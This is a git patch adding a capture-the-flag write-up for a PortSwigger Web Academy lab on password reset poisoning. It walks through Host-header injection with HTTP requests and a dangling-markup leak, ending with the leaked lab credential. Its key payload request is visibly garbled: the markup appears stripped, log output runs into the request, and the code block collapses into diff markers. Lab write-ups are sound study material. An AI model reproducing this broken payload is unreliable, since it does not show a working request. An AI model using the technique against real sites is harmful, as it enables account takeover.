From 932d47d4e1f7d6b3b55cb4ae9af730592bb9877c Mon Sep 17 00:00:00 2001
From: xanhacks
Date: Fri, 9 Dec 2022 18:35:20 +0100
Subject: [PATCH] add host header password leak
---
 docs/web/ctf/web_academy.md | 42 +++++++++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
diff --git a/docs/web/ctf/web_academy.md b/docs/web/ctf/web_academy.md
index fcf5436..5f2a409 100644
--- a/docs/web/ctf/web_academy.md
+++ b/docs/web/ctf/web_academy.md
@@ -6,6 +6,48 @@ ignore_macros: true
 # PortSwigger Web Academy
+## HTTP Host Header attacks
+
+### Password leak via dangling markup
+
+> Lab: [Password reset poisoning via dangling markup](https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-header-password-reset-poisoning-via-dangling-markup)
+
+A normal password reset will send the following email to the user :
+
+```
+Hello!
+
+Please click here (https://xxx.web-security-academy.net/login) to login with your new password: D7c0EJwAWM
+
+Thanks,
+Support team
+This email has been scanned by the MacCarthy Email Security service
+```
+
+We can inject the host header in the password reset request to modify the link inside the email :
+
+```
+POST /forgot-password HTTP/1.1
+Host: xxx.web-security-academy.net:CANARY1337 // <- here
+```
+
+We now have the following link : `https://xxx.web-security-academy.net:CANARY1337/login`
+
+Let's try to leak the password using dangling markup :
+
+```
+POST /forgot-password HTTP/1.1
+Host: xxx.web-security-academy.net:">click+here+to+login+with+your+new+password:+ld92i9hv1e

Thanks,
Support+team

This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service HTTP/1.1" 404 +``` + +You can now login into the carlos account with `carlos:ld92i9hv1e`. + ## DOM Clobbering ### DOM clobbering to bypass DOMPurify